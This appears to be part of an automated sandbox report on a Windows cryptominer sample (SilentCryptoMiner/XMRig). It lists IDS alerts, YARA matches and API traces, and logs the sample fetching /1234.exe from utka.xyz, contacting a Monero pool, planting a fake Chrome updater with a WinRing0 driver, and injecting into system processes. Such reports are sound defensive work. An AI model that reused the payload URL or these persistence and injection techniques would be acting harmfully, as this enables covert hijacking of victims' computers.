Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000027.00000002.2659725300.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.1776996547.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdbdll source: svchost.exe, 00000027.00000002.2659725300.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.1776996547.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: $@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 00000027.00000000.1777078307.0000016F9BC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2661252404.0000016F9BC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: updater.exe, 0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp
Source:	Binary string: System.Configuration.ni.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdbRSDS7^3l source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: mscorlib.pdbp source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 00000027.00000000.1777039150.0000016F9BC42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2660788551.0000016F9BC42000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.Management.pdb) source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: &@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 00000027.00000000.1777078307.0000016F9BC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2661252404.0000016F9BC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 00000027.00000000.1777039150.0000016F9BC42000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2660788551.0000016F9BC42000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Drawing.ni.pdbRSDS source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctC19B.tmp.pdb source: svchost.exe, 00000027.00000000.1777078307.0000016F9BC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2661252404.0000016F9BC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 00000027.00000002.2659725300.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.1776996547.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbSystem.Management.dll source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831d0 @ source: svchost.exe, 00000027.00000002.2659725300.0000016F9BC32000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.1776996547.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 00000027.00000002.2659725300.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.1776996547.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdbMZ@ source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: mscorlib.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.Drawing.pdb/ source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.Management.ni.pdbRSDSJ< source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.Drawing.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.Management.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: mscorlib.ni.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.Management.ni.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.Core.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb821* source: svchost.exe, 00000027.00000000.1777078307.0000016F9BC5C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.2661252404.0000016F9BC5C000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 00000027.00000002.2659725300.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000027.00000000.1776996547.0000016F9BC2B000.00000004.00000001.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.ni.pdb source: WERE4D.tmp.dmp.10.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERE4D.tmp.dmp.10.dr

Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC6038BE3C FindFirstFileExW,	27_2_000001FC6038BE3C
Source: C:\Windows\System32\lsass.exe	Code function: 30_2_00000161C737BE3C FindFirstFileExW,	30_2_00000161C737BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 31_2_00000233B91EBE3C FindFirstFileExW,	31_2_00000233B91EBE3C
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_000002109192BE3C FindFirstFileExW,	32_2_000002109192BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 33_2_000002062E99BE3C FindFirstFileExW,	33_2_000002062E99BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B8DABE3C FindFirstFileExW,	34_2_00000282B8DABE3C
Source: C:\Windows\System32\svchost.exe	Code function: 34_2_00000282B934BE3C FindFirstFileExW,	34_2_00000282B934BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 35_2_000002285734BE3C FindFirstFileExW,	35_2_000002285734BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 36_2_0000018F9CD0BE3C FindFirstFileExW,	36_2_0000018F9CD0BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_00000207BAC3BE3C FindFirstFileExW,	37_2_00000207BAC3BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 38_2_000001FBDB9CBE3C FindFirstFileExW,	38_2_000001FBDB9CBE3C
Source: C:\Windows\System32\svchost.exe	Code function: 39_2_0000016F9CA0BE3C FindFirstFileExW,	39_2_0000016F9CA0BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A0183BE3C FindFirstFileExW,	40_2_0000027A0183BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 40_2_0000027A01BDBE3C FindFirstFileExW,	40_2_0000027A01BDBE3C
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_0082BE3C FindFirstFileExW,	45_2_0082BE3C
Source: C:\Program Files\Google\Chrome\updater.exe	Code function: 45_2_00B9BE3C FindFirstFileExW,	45_2_00B9BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000002992B26BE3C FindFirstFileExW,	47_2_000002992B26BE3C
Source: C:\Windows\System32\svchost.exe	Code function: 47_2_000002992B2CBE3C FindFirstFileExW,	47_2_000002992B2CBE3C

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2054247 - Severity 1 - ET MALWARE SilentCryptoMiner Agent Config Inbound : 104.20.4.235:443 -> 192.168.2.10:49983

Performs DNS queries to domains with low reputation

Source:

DNS query: utka.xyz

Source: global traffic

HTTP traffic detected: GET /1234.exe HTTP/1.1Host: utka.xyzConnection: Keep-Alive

Source: Joe Sandbox View

ASN Name: NTT-LT-ASLT NTT-LT-ASLT

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.10:55489 -> 1.1.1.1:53

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /1234.exe HTTP/1.1Host: utka.xyzConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: utka.xyz

Source: svchost.exe, 00000028.00000000.1781187667.00000279FEFD0000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://Passport.NET/tb
Source: lsass.exe, 0000001E.00000000.1705089386.00000161C6D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2676250564.00000161C6D51000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: lsass.exe, 0000001E.00000000.1705356363.00000161C6DAF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2677587597.00000161C6DAF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2675844700.00000161C6CE1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000000.1704976561.00000161C6CE1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: lsass.exe, 0000001E.00000000.1705089386.00000161C6D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2676250564.00000161C6D51000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt0
Source: updater.exe, 0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: updater.exe, 0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: updater.exe, 0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: updater.exe, 0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: lsass.exe, 0000001E.00000000.1705089386.00000161C6D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2676250564.00000161C6D51000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: lsass.exe, 0000001E.00000000.1705356363.00000161C6DAF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2677587597.00000161C6DAF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2675844700.00000161C6CE1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000000.1704976561.00000161C6CE1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: lsass.exe, 0000001E.00000000.1705089386.00000161C6D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2676250564.00000161C6D51000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000001E.00000000.1705356363.00000161C6DAF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2677587597.00000161C6DAF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2675844700.00000161C6CE1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000000.1704976561.00000161C6CE1000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: lsass.exe, 0000001E.00000000.1705089386.00000161C6D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2676250564.00000161C6D51000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl0
Source: lsass.exe, 0000001E.00000002.2676250564.00000161C6CF2000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000000.1705089386.00000161C6CF2000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: lsass.exe, 0000001E.00000002.2673246075.00000161C6C00000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000000.1704500762.00000161C6C00000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: lsass.exe, 0000001E.00000000.1703894174.00000161C642F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2667571192.00000161C642F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702
Source: lsass.exe, 0000001E.00000002.2668510529.00000161C644F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000000.1703967455.00000161C644F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: lsass.exe, 0000001E.00000000.1703894174.00000161C642F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2667571192.00000161C642F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: powershell.exe, 00000018.00000002.1759888871.0000014DD5CD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: lsass.exe, 0000001E.00000000.1705356363.00000161C6DAF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2677587597.00000161C6DAF000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2675844700.00000161C6CE1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000000.1704976561.00000161C6CE1000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000000.1705089386.00000161C6D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2676250564.00000161C6D51000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: lsass.exe, 0000001E.00000000.1705089386.00000161C6D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2676250564.00000161C6D51000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: powershell.exe, 00000018.00000002.1729262490.0000014DC5E89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: svchost.exe, 0000002F.00000000.1811725307.000002992A3E0000.00000002.00000001.00040000.00000000.sdmp	String found in binary or memory: http://schemas.micro
Source: powershell.exe, 00000018.00000002.1729262490.0000014DC5E89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: lsass.exe, 0000001E.00000000.1703894174.00000161C642F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2667571192.00000161C642F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: lsass.exe, 0000001E.00000000.1703894174.00000161C642F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2667571192.00000161C642F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: zufmUwylvo.exe, 00000000.00000002.1705706882.000001B600001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1729262490.0000014DC5C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: lsass.exe, 0000001E.00000002.2668510529.00000161C644F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000000.1703967455.00000161C644F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/07/securitypolicy
Source: powershell.exe, 00000018.00000002.1729262490.0000014DC5E89000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000001E.00000000.1703894174.00000161C642F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2667571192.00000161C642F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: lsass.exe, 0000001E.00000000.1703894174.00000161C642F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2667571192.00000161C642F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/a
Source: lsass.exe, 0000001E.00000000.1703894174.00000161C642F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2667571192.00000161C642F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap12/
Source: powershell.exe, 00000018.00000002.1729262490.0000014DC5E89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lsass.exe, 0000001E.00000000.1705089386.00000161C6D51000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001E.00000002.2676250564.00000161C6D51000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: powershell.exe, 00000018.00000002.1774198630.0000014DDE299000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.1775594830.0000014DDE389000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.co
Source: powershell.exe, 00000018.00000002.1775594830.0000014DDE389000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.cob
Source: powershell.exe, 00000018.00000002.1774198630.0000014DDE299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.coi/certs/MicRooCerAut_2010-06-23.crt0
Source: powershell.exe, 00000018.00000002.1729262490.0000014DC5C61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000018.00000002.1729262490.0000014DC5E89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
Source: powershell.exe, 00000018.00000002.1759888871.0000014DD5CD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000018.00000002.1759888871.0000014DD5CD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000018.00000002.1759888871.0000014DD5CD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000018.00000002.1729262490.0000014DC5E89000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000018.00000002.1759888871.0000014DD5CD3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: zufmUwylvo.exe, 00000000.00000002.1705706882.000001B600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://utka.xyz
Source: zufmUwylvo.exe, 00000000.00000002.1705706882.000001B600001000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://utka.xyz/1234.exe
Source: updater.exe, 0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms

Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723

Source: unknown

HTTPS traffic detected: 84.32.84.109:443 -> 192.168.2.10:49723 version: TLS 1.2

Operating System Destruction

Protects its processes via BreakOnTermination flag

Source: C:\Program Files\Google\Chrome\updater.exe	Process information set: 01 00 00 00
Source: C:\Program Files\Google\Chrome\updater.exe	Process information set: 01 00 00 00

System Summary

Malicious sample detected (through community Yara rule)

Source: 45.2.updater.exe.14001fa80.9.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 45.2.updater.exe.14001fa80.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 45.2.updater.exe.14001fa80.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 45.2.updater.exe.140040c40.7.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 45.2.updater.exe.140040c40.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 45.2.updater.exe.140040c40.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 45.2.updater.exe.140062860.8.raw.unpack, type: UNPACKEDPE	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 45.2.updater.exe.140062860.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 45.2.updater.exe.140062860.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000002D.00000002.1900732139.000000014001C000.00000004.00000001.01000000.0000000B.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: updater.exe PID: 5804, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPED	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPED	Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: C:\Windows\Temp\jscseoeoqftm.tmp, type: DROPPED	Matched rule: Detects coinmining malware Author: ditekSHen

PE file contains section with special chars

Source: zxcvbnmasd.exe.0.dr	Static PE information: section name: .e;T
Source: zxcvbnmasd.exe.0.dr	Static PE information: section name: ."Ki
Source: zxcvbnmasd.exe.0.dr	Static PE information: section name: ..>f
Source: updater.exe.3.dr	Static PE information: section name: .e;T
Source: updater.exe.3.dr	Static PE information: section name: ."Ki
Source: updater.exe.3.dr	Static PE information: section name: ..>f

Uses powercfg.exe to modify the power settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0

Source: C:\Windows\System32\dialer.exe	Code function: 22_2_00007FF723DE10C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,	22_2_00007FF723DE10C0
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC60382A7C NtEnumerateValueKey,NtEnumerateValueKey,	27_2_000001FC60382A7C
Source: C:\Windows\System32\lsass.exe	Code function: 30_2_00000161C73726F0 NtQueryDirectoryFileEx,GetFileType,StrCpyW,	30_2_00000161C73726F0
Source: C:\Windows\System32\lsass.exe	Code function: 30_2_00000161C73721CC NtQuerySystemInformation,StrCmpNIW,	30_2_00000161C73721CC
Source: C:\Windows\System32\dwm.exe	Code function: 32_2_0000021091922A7C NtEnumerateValueKey,NtEnumerateValueKey,	32_2_0000021091922A7C
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_00000207BAC323F0 GetProcessIdOfThread,GetCurrentProcessId,CreateFileW,WriteFile,ReadFile,CloseHandle,NtResumeThread,	37_2_00000207BAC323F0
Source: C:\Windows\System32\svchost.exe	Code function: 37_2_00000207BAC321CC NtQuerySystemInformation,StrCmpNIW,	37_2_00000207BAC321CC

Source: C:\Program Files\Google\Chrome\updater.exe

File created: C:\Program Files\Google\Libs\WR64.sys

Source: C:\Program Files\Google\Chrome\updater.exe

File deleted: C:\Windows\Temp\jscseoeoqftm.tmp

Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00007FF7C0DCAF46	0_2_00007FF7C0DCAF46
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00007FF7C0DCBCF2	0_2_00007FF7C0DCBCF2
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00007FF7C0DC0EFA	0_2_00007FF7C0DC0EFA
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00007FF7C0DC0ED3	0_2_00007FF7C0DC0ED3
Source: C:\Users\user\Desktop\zufmUwylvo.exe	Code function: 0_2_00007FF7C0DC0E6D	0_2_00007FF7C0DC0E6D
Source: C:\Windows\System32\dialer.exe	Code function: 22_2_00007FF723DE14E4	22_2_00007FF723DE14E4
Source: C:\Windows\System32\dialer.exe	Code function: 22_2_00007FF723DE2328	22_2_00007FF723DE2328
Source: C:\Windows\System32\dialer.exe	Code function: 22_2_00007FF723DE1DB4	22_2_00007FF723DE1DB4
Source: C:\Windows\System32\dialer.exe	Code function: 22_2_00007FF723DE26E8	22_2_00007FF723DE26E8
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 24_2_00007FF7C0DC52FA	24_2_00007FF7C0DC52FA
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC5FFA1658	27_2_000001FC5FFA1658
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC5FF9B23C	27_2_000001FC5FF9B23C
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC5FF920DC	27_2_000001FC5FF920DC
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC5FF9B030	27_2_000001FC5FF9B030
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC5FF9F2F8	27_2_000001FC5FF9F2F8
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC6038FEF8	27_2_000001FC6038FEF8
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC6038BC30	27_2_000001FC6038BC30
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC60382CDC	27_2_000001FC60382CDC
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC60392258	27_2_000001FC60392258
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC6038BE3C	27_2_000001FC6038BE3C
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC603BF2F8	27_2_000001FC603BF2F8
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC603BB030	27_2_000001FC603BB030
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC603B20DC	27_2_000001FC603B20DC
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC603C1658	27_2_000001FC603C1658
Source: C:\Windows\System32\winlogon.exe	Code function: 27_2_000001FC603BB23C	27_2_000001FC603BB23C
Source: C:\Windows\System32\lsass.exe	Code function: 30_2_00000161C73420DC	30_2_00000161C73420DC
Source: C:\Windows\System32\lsass.exe	Code function: 30_2_00000161C734B030	30_2_00000161C734B030
Source: C:\Windows\System32\lsass.exe	Code function: 30_2_00000161C7351658	30_2_00000161C7351658
Source: C:\Windows\System32\lsass.exe	Code function: 30_2_00000161C734F2F8	30_2_00000161C734F2F8
Source: C:\Windows\System32\lsass.exe	Code function: 30_2_00000161C734B23C	30_2_00000161C734B23C
Source: C:\Windows\System32\lsass.exe	Code function: 30_2_00000161C7372CDC	30_2_00000161C7372CDC
Source: C:\Windows\System32\lsass.exe	Code function: 30_2_00000161C737BC30	30_2_00000161C737BC30
